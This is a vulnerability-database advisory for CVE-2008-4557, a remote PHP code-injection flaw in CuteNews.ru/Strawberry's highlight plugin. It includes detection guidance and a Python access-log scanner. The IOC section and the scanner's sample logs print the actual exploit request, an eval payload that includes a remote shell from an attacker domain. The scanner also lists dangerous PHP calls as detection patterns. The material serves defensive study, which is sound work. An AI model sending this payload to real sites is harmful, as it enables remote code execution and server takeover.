cbcvebase.
CVE-2008-4557
published 2008-10-14

CVE-2008-4557: plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text…

Priority: P2 · 67 · critical · CVSS 2.0 score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 45.34% (98.6th percentile)
plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text parameter, which is inserted into an executable regular expression.

Affected (1 range)

Vendor: cutephp · Product: cutenews · Version range: (not listed) · Fixed in: (not listed)

Detection & IOCs (extracted from sources)

path: plugins/wacko/highlight/html.php
url: strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
domain: blackybr.nm.ru
command: text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
  • The vulnerable parameter is `text` in html.php; attacker injects PHP code wrapped in HTML comment syntax `<!--{${eval(...)}}-->` which is executed via preg_replace() with the 'e' modifier.
  • Monitor HTTP requests targeting `plugins/wacko/highlight/html.php` with a `text` parameter containing PHP eval/include payloads, especially URL-encoded `<!--{${...}}-->` patterns.
  • The exploit payload uses `include()` to pull a remote shell from an attacker-controlled domain; detect outbound PHP include/require calls to external hosts originating from the web process.
  • Exploitation requires `allow_url_include` (or `allow_url_fopen`) to be enabled in PHP for the remote `include()` payload to fetch the shell; environments with these disabled may still be vulnerable to local code injection via eval.
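As an added detection example (not code from this page or from CuteNews), the following Python applies the monitoring advice above to constructed access-log lines. It percent-decodes every query parameter rather than only `text`, because the recorded payload places its `include()` in a second parameter `s`; the log lines, client addresses and marker list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Path of the vulnerable script named in the advisory.
VULN_PATH = "plugins/wacko/highlight/html.php"

# Signatures of the technique: PHP's "{${...}}" complex-variable syntax, which is
# what turns a preg_replace() /e replacement into code execution, plus the calls
# such a payload typically wraps in it (assumed list, extend as needed).
MARKERS = {
    "curly_var_syntax": re.compile(r"\{\$\{"),
    "php_call": re.compile(r"\b(?:eval|include(?:_once)?|require(?:_once)?|"
                           r"system|passthru|shell_exec)\s*\(", re.I),
}

# Combined-format request line: client address first, request inside quotes.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: one exploit attempt against the vulnerable file, one
# benign use of the same file, and one fully URL-encoded payload aimed elsewhere.
SAMPLE_LOG = r"""
203.0.113.7 - - [14/Oct/2008:10:01:22 +0000] "GET /strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell'); HTTP/1.1" 200 512
203.0.113.7 - - [14/Oct/2008:10:01:40 +0000] "GET /strawberry/plugins/wacko/highlight/html.php?text=%3Cb%3Ehello%3C/b%3E HTTP/1.1" 200 311
198.51.100.9 - - [14/Oct/2008:10:02:05 +0000] "GET /index.php?text=%3C!--%7B%24%7Beval%28%24s%29%7D%7D--%3E HTTP/1.1" 404 120
"""

def inspect_request(client, target):
    """Return a finding dict for one request target, or None if nothing matches."""
    parts = urlsplit(target)
    reasons = []
    if parts.path.endswith(VULN_PATH):
        reasons.append("vulnerable_path")
    # parse_qs percent-decodes values, so %7B%24%7B and a literal {${ look alike.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            for label, rx in MARKERS.items():
                if rx.search(value):
                    reasons.append(f"{label}:{name}")
    if not any(r != "vulnerable_path" for r in reasons):
        return None  # plain use of the file, or no payload anywhere: not a finding
    severity = "high" if "vulnerable_path" in reasons else "medium"
    return {"client": client, "path": parts.path, "severity": severity, "reasons": reasons}

def scan_access_log(log_text):
    """Run inspect_request over every parseable line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            f = inspect_request(m.group("client"), m.group("target"))
            if f:
                findings.append(f)
    return findings
```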